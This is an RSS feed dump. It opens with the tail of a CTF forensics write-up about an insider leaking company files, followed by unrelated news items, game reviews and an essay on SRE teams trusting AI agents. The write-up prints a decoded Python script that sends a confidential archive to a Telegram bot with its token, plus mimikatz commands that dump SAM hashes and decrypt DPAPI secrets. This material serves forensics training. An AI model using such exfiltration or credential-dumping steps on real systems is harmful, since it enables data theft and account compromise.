archive to leak confidential information about QR Tag company. What was it's name?<br>   CONFIDENTIAL.7Z</pre><pre>6) Can you determine the number of files have been leaked?</pre><p>that’s so simple, in the prefetch we did parse we can view all files that was compressed and have been leaked:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ta5ol6w7Sdnpq_GOStubZg.png"></figure><p>just count all files below CONFIDENTIAL.7Z file:</p><pre>6) Can you determine the number of files have been leaked? --&gt; 11</pre><pre>7) When did this archive get deleted?</pre><p>parsing the $J file with MFTECMD <a href="https://ericzimmerman.github.io/#!index.md"><strong>here</strong></a>, which located inC:\$Extend\$J<br>to see all File creation, deletion, renaming timestamps.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rNw6Ri4X0W-n-ReIizk3Og.png"></figure><p>we got the deleted timestamp correctly, 9/19/2025 8:05:17 AM GMT 0.</p><p>convert it to the correct format for the flag answer, and add 3 hours to become GMT +3 as the Local Egyptian Time, then subtract 1 sec.</p><pre>7) When did this archive get deleted?<br>   Answer: 2025-09-19 11:05:16</pre><pre>8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?</pre><p>this question needs deep investigation, and a good eyesight to catch malicious scripts. found a python file in temp called botscript.py full path: C:\Users\mhany\AppData\Local\temp\botscript.py that contains a too long base64 encoded string:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*e9zheBLyZA4DxXRjyr_TkA.png"></figure><p>it’s not just encoded, it’s reversed. And that’s because of this:</p><pre>b64decode(__[::-1]);</pre><p>so let's reverse it first, and decode the base64 <a href="https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=cFFIZWxSbkxsTm5idkIzY2xKSElzSWlPeTltY3lWa0lvUW5icEpIY2dBQ0lnb1FENlUyY3NWbUNOa2lJNXhHYjFaMmN6VjJZalYzY2dRbmJsTkhJbHhXYUdKQ0swNVdheUJISWdBQ0lLMGdPd0FqTWcwVFBnVUdadk4yWHpWSGRoUjNjdVUyY3U5R2N6Vm1jZ1lXYUswZ0NOa1NmbUJpT2lRbmJsMVdkajlHWmlzWFB6VkdicFpHSXMwWE14d1dTSkZEYnNsVU1nb2pJa2wyWDBGR2FqSnllOUVHZGhSR0lzd21jMWhDZHo5R2N1TUhkelZXZHhWbWNnMERJbE5uYnZCM2NsSkhJZ0FDSUswZ09tQnljaEJTS2lJbWNpQUNMSmxVTXN4V01KbFVNc2hpYmxCM2JnZ0dkcGRuQ05vUURpUW5ibDFXZGo5R1JrNVdaejlTZnh3V1NKeEdieEVUU3NGVFM3UjNiaTl5Wnk5bUx0Rm1jblZHYmxSbkxwQlhZdjhpT3pCSGQwaG1JbUJTUGd3bWMxcFFEbm8zTnV3V1lwUm5ibFJXYW01MmJEeEZjdlIzYXpWR1JjbG5iaGhXYmNObmNsTlhWY3B6UW5JSEk5QVNTSkZEYnNGVFNKRkRiSzBnSTVFVE55QUROeEl6TTFJQ0k5QVNNeHdXU0pGRGJzbFVNSzBnSTNSWFpySmtSZlptVWlCMVNpdDJWMzVHY2xwMFFFdEVjbEoxVG9OR2Q0SlhSQkZrT3dFRE0zSXpNMUlqTTRJQ0k5QVNNc2xVU3N4V014a0VieGtrQ05vUUR6UjNjbFZYY2xKSEkwSjNidzFXYQ&amp;oeol=CRLF"><strong>here</strong></a></p><pre>import requests<br><br>I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"<br>1Ill1IIl11 = "5321402519"<br>l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'<br>url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"<br><br>with open(l1II1ll1II, "rb") as f:<br>    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})<br><br>if response.status_code == 200:<br>    print("File sent successfully")<br>else:<br>    print("Error:", response.text)</pre><p>so, he sends the data over telegram bot using a python script</p><pre>8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?<br>   Answer: python</pre><pre>9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>10) Which telegram API did the developer use to send the archive to the bot?</pre><p>from the decoded base64 text we can answer these 2 questions easily</p><pre>import requests<br><br>I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"<br>1Ill1IIl11 = "5321402519"<br>l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'<br>url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"<br><br>with open(l1II1ll1II, "rb") as f:<br>    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})<br><br>if response.status_code == 200:<br>    print("File sent successfully")<br>else:<br>    print("Error:", response.text)</pre><p>simple python script. Read, Understand, Answer.</p><pre>9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>Answer: 8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw:5321402519<br><br>10) Which telegram API did the developer use to send the archive to the bot?<br>Answer: /sendDocument</pre><pre>11) What is the username and password of the database used in QR Tag website? (format: username:password)</pre><p>since he is asking for the username, and password for the QR Tag website.</p><p>we can see there’s QRTag Portaldirectory on mhany’s desktop, that contains 2 other subdirectories (Backend &amp;Frontend). checking the Backend directory, we can find .envfile with absolute path: C:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend\.env</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/597/1*VOfYl_GaLcGcO_LEqprNXg.png"></figure><pre>11) What is the username and password of the database used in QR Tag website? (format: username:password)<br>Answer: H4ny:P@ssw0rd!</pre><pre>12) What version of express did the developer use?</pre><p>In the same Backend directoryC:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend we'll find package.json file that holds the correct answer</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/601/1*03OyPQ3xqNlhS6BK7U5UZA.png"></figure><pre>12) What version of express did the developer use?<br>Answer: 4.19.2</pre><pre>13) What service will the QR Tag partnership provide?</pre><p>checking the Docs directory which located in: C:\Users\mhany\Desktop\Work\QR Tag\Docs\ we can see there’s a pdf file calledpartnership_agreement.pdf “<strong>partnership</strong>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/605/1*jQqQBzau5WjDvClCpWZomQ.png"></figure><pre>13) What service will the QR Tag partnership provide?<br>Answer: identity verification and fraud prevention</pre><pre>14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?</pre><p>Now, for the last juicy part.</p><p>in question 13, we could answer it with PDF file located in C:\Users\mhany\Desktop\Work\QR Tag\Docs\ directory.</p><p>So, while i was checking all other documents files, i found a file called <strong>finance.xlsx </strong>with a very strange magic bytes:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/600/1*_QngmJL0MUNTrhdsO8sVcw.png"><figcaption><strong>finance.xlsx</strong></figcaption></figure><p>of course, it’s not the traditional hex values for an excel file. to be more clearer, there’s an another excel file called <strong>user_accounts.xlsx</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/599/1*adUoqSwT8MTYHsfisagBFA.png"><figcaption><strong>user_accounts.xlsx</strong></figcaption></figure><p>See the difference!!!! <strong>finance.xlsx </strong>is definitely not an excel sheet file.</p><p>So, the question now, what it is actually ?</p><p>and the question says “<em>The developer used a security feature to securely encrypt a secret file</em>”.</p><p>so this file is encrypted with a windows security feature i guess!!</p><p>if we did a quick research on the magic bytes on google <strong>01 00 00 00 D0 8C</strong>, we can definitely get to the point.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*w8gjA9AesdtPRXeFAO-oaQ.png"><figcaption><strong>DPAPI</strong></figcaption></figure><p>also i did a very weird research, i uploaded the excel file on VirusTotal <a href="https://www.virustotal.com/gui/file/bfeddbd77a68f15e5489b851235c0c00e822f54446bf716309d35b6b44e30a33/details"><strong>link </strong></a>(first one to upload this file) and by reading Details section, we can definitely make sure that this file contains DPAPI encrypted data (100%)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/798/1*FEHuTsyLcDXhvTlUPkK_Zw.png"></figure><ol><li>we need to recover the DPAPI masterky to decrypt the file data.</li></ol><p>2. and to do recover the DPAPI masterkey, we need to decrypt the masterkey file. location: C\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Protect\&lt;SID&gt;\&lt;GUID&gt;</p><p>3. and to decrypt the masterkey file, we need to recover the logon password for the user “mhany”</p><p>4. and to recover the logon password for this user, we need to decrypt <strong>SAM </strong>registry hive that contains the local account password hashes.</p><p>5. and to decrypt the <strong>SAM</strong> registry hive, we will need also the<strong>SYSTEM</strong>hive<br>which both are located in : C\Windows\System32\config\ directory</p><p>now we know what to do, let’s dig in using mimikatz “<a href="https://github.com/ParrotSec/mimikatz"><strong>link</strong></a>”. running mimikatx .exe file with administrative powershell, then use these commands</p><pre>privilege::debug  #Enables mimikatz to read protected data.<br><br>lsadump::sam /system:&lt;SYSTEM Hive path&gt;/sam:&lt;SAM Hive path&gt;  </pre><p>reading the output, remember we are looking for NTLM hash for mhanyuser only</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/372/1*JfJNV72Qx6C0W85kkth7gA.png"></figure><p>using rainbow-table attack with <a href="https://crackstation.net/"><strong>crackstation</strong></a><strong> </strong>we can get the actual password for this hash</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*875TmuY5AXqNZCopsBFpOQ.png"><figcaption><strong>credentials</strong></figcaption></figure><p>now we get the logon password, let’s recover the master key by decrypting the masterkey file. with mimikatz again, we can use these commands</p><pre>sekurlsa::lgonpasswords   # Because we already have the logon password<br><br>dpapi::masterkey /in:"path to: C\Users\mhany\AppData\Roaming\Microsoft\Protect\&lt;SID&gt;\&lt;GUID&gt;" /password:"credentials"</pre><p>now we can get the decrypted master key in hex.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fXyi9YeGe-Ncpq76Mz4sVw.png"></figure><p>final step, is to finally decrypt the encrypted finance.xlsx<strong> </strong>file with the key</p><pre>dpapi::blob /in:"path to C:\Users\mhany\Desktop\Work\QR Tag\Docs\finance.xlsx" /masterkey:"d96486156b7651c31945791790941b62f180d198c06966e7e9568d594375c760cf528e6bf55a3bd6dc1bec079b38cbb569a222444ffce861b71a61330ddd1"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/820/1*qhpnzdCAvttlY2pf8U0OMA.png"><figcaption><strong>FINALLY</strong></figcaption></figure><p>lets decode this encoded base64 data with cyberchef “<a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=ZFhNeGJtZGZiVFJ6ZEROeVgyc3plVjkwTUY5a00yTnllWEIwWDBSUVFWQkpYMlZ1WTNKNWNIUXpaRjl6TTJOeU0zUno"><strong>link</strong></a>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/707/1*eCpSy434mV-LpDgh57IOVg.png"><figcaption>OMG!</figcaption></figure><pre>14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?<br>Answer: us1ng_m4st3r_k3y_t0_d3crypt_DPAPI_encrypt3d_s3cr3ts</pre><p>now we can submit all answers and get the flag</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lGNgwO5Dahi9uwAaHJqp4g.png"></figure><pre>IEEE{Ins1d3r_Thr34t_0r_Just_A_Mad_Dev3l0per}</pre><h4>Thanks For Reading, Hope you enjoyed❤️</h4><p>Keep in touch with me via:</p><p><a href="https://www.linkedin.com/in/loay-salah"><strong>LinkedIn</strong></a></p><p><strong>Discord</strong>: prankster99</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3b49a1afe7f6" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/ieee-mansb-ctf-2025-dfir-writeup-3b49a1afe7f6">IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quote of the day by Mark Zuckerberg: 'Metaverse isn't a thing a company builds. It's the next chapter of the internet overall' — a prediction that hit wide of the mark]]></title>
<description><![CDATA[The Meta CEO's pandemic-era predictions on the future of technology failed to materilaize]]></description>
<link>https://tsecurity.de/de/3591923/it-nachrichten/quote-of-the-day-by-mark-zuckerberg-metaverse-isnt-a-thing-a-company-builds-its-the-next-chapter-of-the-internet-overall-a-prediction-that-hit-wide-of-the-mark/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591923/it-nachrichten/quote-of-the-day-by-mark-zuckerberg-metaverse-isnt-a-thing-a-company-builds-its-the-next-chapter-of-the-internet-overall-a-prediction-that-hit-wide-of-the-mark/</guid>
<pubDate>Fri, 12 Jun 2026 00:02:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Meta CEO's pandemic-era predictions on the future of technology failed to materilaize]]></content:encoded>
</item>
<item>
<title><![CDATA[Yossi Matias on the golden age of research]]></title>
<description><![CDATA[Author: Google for Developers - Bewertung: 14x - Views:199 Yossi Matias, Vice President at Google and Head of Google Research, joins host Logan Kilpatrick for a wide-ranging conversation about what it means to do research at Google scale. Their conversation explores the "magic cycle” of research ...]]></description>
<link>https://tsecurity.de/de/3591684/videos/yossi-matias-on-the-golden-age-of-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591684/videos/yossi-matias-on-the-golden-age-of-research/</guid>
<pubDate>Thu, 11 Jun 2026 21:32:38 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Google for Developers - Bewertung: 14x - Views:199 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/FPBwadTeph0?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Yossi Matias, Vice President at Google and Head of Google Research, joins host Logan Kilpatrick for a wide-ranging conversation about what it means to do research at Google scale. Their conversation explores the "magic cycle” of research from breakthrough to real-world impact across flood forecasting, MedGemma, and the just-launched Gemini for Science. Learn more about AI tools for scientific discovery including Co-Scientist and Empirical Research Assistance (ERA), and topics like speculative decoding, generative UI, and quantum computing milestones including the Willow chip.<br />
<br />
Watch more Release Notes → https://goo.gle/4njokfg <br />
Subscribe to Google for Developers → https://goo.gle/developers <br />
<br />
Speaker: Yossi Matias, Logan Kilpatrick <br />
Products Mentioned:  Google AI, Gemini<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Vision Pro's biggest problem isn't addressed in visionOS 27, but progress is progress]]></title>
<description><![CDATA[In spite of the AI-heavy WWDC, Apple Vision Pro still got plenty of attention with visionOS 27. Here's what Apple got right and where it still needs work.Apple Vision Pro gets another great update with visionOS 27I've been asked to provide my first impressions of visionOS 27, and honestly, I thin...]]></description>
<link>https://tsecurity.de/de/3590596/ios-mac-os/apple-vision-pros-biggest-problem-isnt-addressed-in-visionos-27-but-progress-is-progress/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590596/ios-mac-os/apple-vision-pros-biggest-problem-isnt-addressed-in-visionos-27-but-progress-is-progress/</guid>
<pubDate>Thu, 11 Jun 2026 14:54:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In spite of the AI-heavy WWDC, Apple Vision Pro still got plenty of attention with <a href="https://appleinsider.com/inside/visionos-27" title="visionOS 27" data-kpt="1">visionOS 27</a>. Here's what Apple got right and where it still needs work.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67903-143177-Apple-Vision-Pro-M5-keyboard-table-xl.jpg" alt="Apple Vision Pro on a table by a mechanical keyboard and a Magic Trackpad in dramatic lighting" height="738"><br><span>Apple Vision Pro gets another great update with visionOS 27</span></div><br>I've been asked to provide my first impressions of visionOS 27, and honestly, I think it's a good release. The quality-of-life work continues in this release alongside some really interesting new features.<br><br>There was <a href="https://appleinsider.com/articles/26/05/10/not-dead-yet-apple-vision-still-has-a-future">some talk</a> about Apple basically abandoning <a href="https://appleinsider.com/inside/apple-vision-pro" title="Apple Vision Pro" data-kpt="1">Apple Vision Pro</a>. However, visionOS 27 proves that it is a platform Apple is interested in developing, even if new hardware is <a href="https://appleinsider.com/articles/26/05/31/slimmer-lighter-apple-vision-pro-is-at-least-two-years-away">years away</a>.<br><br><br> <a href="https://appleinsider.com/articles/26/06/11/apple-vision-pros-biggest-problem-isnt-addressed-in-visionos-27-but-progress-is-progress?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244628?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[HellSlave II: Judgment of the Archon Preview (PC)]]></title>
<description><![CDATA[I don’t want to think about fighting level 8 ghoul animals, so I nimbly dodge the groups, staying out of their detection range. I move toward my quest and engage a group that doesn’t move. My items, most scavenged from other dead enemies, give me a time advantage, and I intend to use it.

I infli...]]></description>
<link>https://tsecurity.de/de/3590555/it-security-nachrichten/hellslave-ii-judgment-of-the-archon-preview-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590555/it-security-nachrichten/hellslave-ii-judgment-of-the-archon-preview-pc/</guid>
<pubDate>Thu, 11 Jun 2026 14:39:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I don’t want to think about fighting level 8 ghoul animals, so I nimbly dodge the groups, staying out of their detection range. I move toward my quest and engage a group that doesn’t move. My items, most scavenged from other dead enemies, give me a time advantage, and I intend to use it.

I inflict poison and thorns on the monsters, and then sit back as they finally get to act. They bite, so I activate the healing crystal. My magic wielder adds lightning strikes and kills two beats. I prolong the battle a little to use my healing again and get enough experience to level up.

HellSlave II: Judgment of the Archon is developed by Ars Goetia and published by Dear Villagers. I played a preview of it on the PC using Steam. The video game combines real-time exploration and combat built around time management.

The title’s high-fantasy universe imagines a world stuck at the Medieval society level where archdemons are controlling the land, fighting a war that has lasted for t...]]></content:encoded>
</item>
<item>
<title><![CDATA[The 7th Guest Remake Review – a spirited reboot of a ghost story classic]]></title>
<description><![CDATA[PC, PlayStation 5, Xbox, Nintendo Switch; Vertigo GamesThis clever update captures the 1990s magic of the original… including some of the technical issuesThe 90s were a gold rush for adventure games. LucasArts kicked off the decade with its legendarily irreverent Monkey Island games. Then, Cyan W...]]></description>
<link>https://tsecurity.de/de/3590509/it-nachrichten/the-7th-guest-remake-review-a-spirited-reboot-of-a-ghost-story-classic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590509/it-nachrichten/the-7th-guest-remake-review-a-spirited-reboot-of-a-ghost-story-classic/</guid>
<pubDate>Thu, 11 Jun 2026 14:16:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>PC, PlayStation 5, Xbox, Nintendo Switch; Vertigo Games</strong><br>This clever update captures the 1990s magic of the original… including some of the technical issues</p><p>The 90s were a gold rush for adventure games. LucasArts kicked off the decade with its legendarily irreverent <a href="https://www.theguardian.com/games/2020/oct/01/the-secret-of-monkey-island">Monkey Island</a> games. Then, Cyan Worlds materialised to deliver a series of atmospheric and boundary-pushing odysseys with Myst and <a href="https://www.theguardian.com/games/article/2024/jul/13/riven-review-reboot-of-90s-classic-myst-ronan-farrow-cyan-worlds">Riven</a>. Nestled between these primary genre texts is The 7th Guest, a lesser-known but still notorious adventure that earned plaudits for its unique FMV visual style, blending live-action filmed footage with pre-rendered 3D backgrounds. It was remade originally for VR, and now has been reconfigured into something playable on PC and consoles, its digital cobwebs cleared and tricky puzzles tinkered with for a fresh (or nostalgic) audience.</p><p>We are dropped into the ectoplasmic shoes of an amnesiac apparition, arriving at the gloomy haunted home of a toy-maker. Armed with a time-bending lantern and a Ouija board-shaped map, your job is to solve a historical whodunnit by literally illuminating events from the past. It’s a melodramatic, surprisingly campy adventure that effectively evokes the overzealous CD-Rom horror of its original era.</p> <a href="https://www.theguardian.com/games/2026/jun/11/the-7th-guest-remake-review">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[What SRE teams need before they trust AI agents]]></title>
<description><![CDATA[The future of reliability will not be defined by whether site reliability engineering (SRE) teams use AI agents, but by the conditions under which they choose to trust them. In high-stakes systems, trust is never granted because a demo looks impressive; it is earned through observability, constra...]]></description>
<link>https://tsecurity.de/de/3590090/it-security-nachrichten/what-sre-teams-need-before-they-trust-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590090/it-security-nachrichten/what-sre-teams-need-before-they-trust-ai-agents/</guid>
<pubDate>Thu, 11 Jun 2026 12:08:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The future of reliability will not be defined by whether site reliability engineering (SRE) teams use AI agents, but by the conditions under which they choose to trust them. In high-stakes systems, trust is never granted because a demo looks impressive; it is earned through observability, constraints, accountability and repeated evidence that the system helps more than it harms.</p>



<p>Right now, many teams are exploring AI for incident response, alert triage, root cause analysis and runbook automation because modern systems generate more context than humans can process quickly under pressure. That interest is justified. But the most mature SRE organizations understand something important: the real challenge is not building an agent that can act, it is building an operating model that people can trust in production.</p>



<h2 class="wp-block-heading">Trust is operational, not emotional</h2>



<p>SRE teams do not trust tools in the abstract. They trust behavior under stress. A platform earns credibility when it helps engineers make better decisions during noisy alerts, partial outages, failed deploys and ambiguous telemetry, not when it generates polished answers in ideal conditions .</p>



<p>That is why generic AI often falls short in production. It may be fluent, but fluency is not reliability. Live systems demand awareness of ownership, dependency maps, escalation paths, blast radius and policy boundaries, and without that context an AI agent can sound helpful while being operationally dangerous . For SRE teams, trust starts when the agent proves it understands the system it is operating around.</p>



<h3 class="wp-block-heading">The trust ladder<br></h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/the-trust-ladder.png?w=1024" alt="The trust ladder" class="wp-image-4183671" width="1024" height="746" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Neel Shah</p></div>



<p>Teams do not move directly from experimentation to autonomy. They move up a ladder of trust, where each step is validated in production-like conditions before the next one is allowed.</p>



<h2 class="wp-block-heading">The 1st requirement: Grounded observability</h2>



<p>Before teams trust an AI agent, they need a telemetry foundation that the agent can actually reason over. If logs are incomplete, traces are missing, ownership is unclear and deployment metadata is scattered across tools, the agent will not become intelligent by magic. It will simply become confidently under-informed.</p>



<p>This is why observability is the real prerequisite for agentic SRE. The strongest AI SRE approaches are grounded in correlated metrics, logs, traces, changes and incident history so that recommendations are evidence-backed rather than speculative. An AI agent cannot create operational truth; it can only synthesize the truth your systems already expose.</p>



<p>In practice, that means teams need more than dashboards. They need clean service ownership, change tracking, incident timelines, runbooks and enough signal quality that an agent can distinguish a symptom from a cause. Without that groundwork, the AI layer becomes theatre</p>



<h3 class="wp-block-heading">What grounded observability looks like</h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/from-monitoring-to-ai-assistance.png" alt="From monitoring to AI assistance" class="wp-image-4183672" width="962" height="1020" sizes="auto, (max-width: 962px) 100vw, 962px"></figure><p class="imageCredit">Neel Shah</p></div>



<p>Monitoring tells you that something is wrong, while observability helps explain why. AI becomes useful only when it sits on top of both layers, not instead of them.</p>



<h2 class="wp-block-heading">The 2nd requirement: Clear guardrails</h2>



<p>The fastest way to lose trust in AI is to give it authority before defining its boundaries. In operations, the question is not “Can the agent do this?” but “Under what conditions should it be allowed to do this, and who is accountable if it is wrong?”</p>



<p>This is where guardrails matter. Strong SRE teams want explicit permission models, approval gates, action allowlists, audit trails and rollback paths before an agent touches anything meaningful in production. That may sound restrictive, but it is exactly what makes adoption viable. Constraint is not the enemy of agentic systems; constraint is what makes them usable.</p>



<p>The most practical path is progressive autonomy. Let the agent start by summarizing incidents, correlating changes and suggesting next steps. Then move to read-only diagnostics. Only after consistent success should it be allowed to trigger low-risk automation, and even then, within tightly defined policies. Trust grows when the blast radius stays small.</p>



<h3 class="wp-block-heading">Visual: Progressive autonomy model</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Stage</strong></td><td><strong>Agent role</strong></td><td><strong>Risk level</strong></td><td><strong>Human involvement</strong></td></tr><tr><td>Stage 1</td><td>Summarize alerts and incidents</td><td>Low</td><td>Human reviews output [cite:8]</td></tr><tr><td>Stage 2</td><td>Pull telemetry and correlate changes</td><td>Low to medium</td><td>Human approves decisions [cite:41][cite:52]</td></tr><tr><td>Stage 3</td><td>Recommend remediation actions</td><td>Medium</td><td>Human confirms action [cite:42][cite:43]</td></tr><tr><td>Stage 4</td><td>Execute pre-approved low-risk actions</td><td>Medium</td><td>Human supervises and can override [cite:44][cite:52]</td></tr><tr><td>Stage 5</td><td>Broad autonomous action</td><td>High</td><td>Rarely acceptable without strict policy controls [cite:43][cite:54]</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">The 3rd requirement: Human-in-the-loop design</h2>



<p>SRE teams are not looking for an AI replacement. They are looking for leverage. The most credible operating model is not autonomous-by-default but supervised-by-design, where agents accelerate understanding and execution while humans retain judgment over risk, trade-offs and unusual conditions .</p>



<p>That distinction matters because incidents are rarely just technical events. They involve business impact, customer communication, cross-team coordination and decisions shaped by context that may not exist in telemetry alone . An agent can help identify a likely bad deploy, but it cannot fully own the decision about whether to roll back during a major customer launch without broader situational awareness.</p>



<p>Human-in-the-loop does not mean slowing everything down. It means designing different levels of oversight for different classes of action. Low-risk tasks such as drafting an incident summary or pulling related dashboards may be automatic. Restarting a background worker might require lightweight approval. Disabling a core production dependency should remain firmly human-controlled . Mature trust comes from matching autonomy to risk.</p>



<h2 class="wp-block-heading">The 4th requirement: Explainability over magic</h2>



<p>SRE teams will not trust an agent that gives answers without showing its work. In reliability engineering, a recommendation is only as useful as the evidence behind it. Engineers need to know which metrics changed, which deployment correlated with the issue, which logs support the hypothesis and how confident the system actually is.</p>



<p>This is one of the biggest lessons emerging from operational AI systems. Precision matters but trust also depends on whether humans can inspect the reasoning path, challenge it and understand uncertainty in familiar terms . The best agent experiences feel less like oracles and more like disciplined collaborators: they surface context, rank hypotheses and make clear what they know versus what they infer .</p>



<p>That is especially important because AI failure in SRE is rarely dramatic at first. It often starts as subtle overconfidence. The agent sounds convincing, the team moves faster and only later does it become clear that the recommendation was based on incomplete evidence. Explainability is what keeps speed from turning into hidden fragility.</p>



<h2 class="wp-block-heading">The 5th requirement: Evaluation in real incidents</h2>



<p>Trust cannot be built on benchmarks alone. SRE teams need evidence from scenarios that resemble their actual world: noisy alerts, incomplete data, conflicting symptoms, repeated incidents and multi-service failures . This is why post-incident evaluation is becoming one of the most important practices in AI-assisted operations.</p>



<p>Some of the most interesting approaches focus on replaying past incidents and measuring how the AI would have performed once the real outcome is already known . That creates a concrete way to score whether the agent identified the right signals, prioritized the right hypotheses or recommended safe and useful next steps. It also shifts the conversation from hype to measurable reliability impact.</p>



<p>For SRE leaders, this is a critical mindset change. Do not ask whether the agent is impressive. Ask whether it consistently shortens investigation time, reduces false escalation, improves documentation quality and avoids introducing new operational risk . Trust follows evidence, not enthusiasm.</p>



<h2 class="wp-block-heading">The 6th requirement: Fit with existing workflows</h2>



<p>One reason some AI initiatives fail inside engineering teams is that they force a new workflow instead of strengthening the one that already works. SRE teams already have paging tools, Slack channels, dashboards, escalation policies and runbooks. An AI agent earns trust faster when it respects those patterns rather than trying to replace them all at once.</p>



<p>This is where incremental adoption becomes strategic. If the agent can appear in the incident channel, pull context from observability tools, draft timelines and recommend actions inside the systems engineers already trust, the barrier to adoption drops sharply. The agent becomes part of the response loop rather than another platform demanding attention during an outage.</p>



<p>That compatibility matters culturally as much as technically. SRE is built on disciplined operational habits. Tools that complement those habits can gain traction. Tools that disrupt them without providing value usually get ignored after the first few frustrating incidents.</p>



<p>If you need a more detailed guide to keep points while evaluating AI SRE tools, then check this<a href="https://stackgen.com/blog/ai-sre-tools-buyers-guide-2026"> buyer’s guide</a> by one of the senior leaders.</p>



<h2 class="wp-block-heading">What trust looks like in practice</h2>



<p>When an SRE team truly trusts an AI agent, several things are visible. The team does not treat it as a novelty. They treat it as a bounded operational partner. They know where it adds value, where it must ask for approval and where it should stay out of the way.</p>



<p>Trust also changes behavior. Engineers stop wasting the first 10 minutes of an incident assembling basic context because the agent already did that well. Incident channels become more structured because summaries, timelines and likely causes are surfaced early. Runbooks improve because teams start writing them in ways both humans and machines can execute or reference . In that environment, AI is not replacing rigor. It is reinforcing it.</p>



<p>Most importantly, trusted AI agents reduce toil without eroding accountability. The on-call engineer is still responsible. The incident commander is still responsible. The organization still owns the reliability posture. The agent simply helps the system operate with more speed and clarity.</p>



<h2 class="wp-block-heading">The leadership shift behind all of this</h2>



<p>This is why the conversation about AI agents in SRE is ultimately a leadership question, not just a tooling question. Teams do not need another shiny automation layer. They need a clear philosophy for how autonomy, human judgment, safety and reliability will work together.</p>



